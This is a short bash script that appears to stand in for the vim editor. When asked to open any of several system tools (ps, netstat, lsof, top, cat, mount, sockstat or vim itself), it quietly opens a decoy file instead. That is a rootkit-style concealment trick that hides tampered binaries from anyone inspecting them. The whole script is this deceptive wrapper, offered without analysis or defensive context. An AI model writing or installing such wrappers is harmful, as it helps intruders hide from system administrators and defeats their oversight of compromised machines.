#!/bin/bash
farg=${1##*/}
if [[ -z "${farg// }" ]]; then
    /actual_vim $@
    exit
fi
substr="lsofmountnetstatpssockstattopcatvim"
if  [[ $substr =~ .*$farg.* ]]; then
    /actual_vim /some_binary
    exit
fi
/actual_vim $@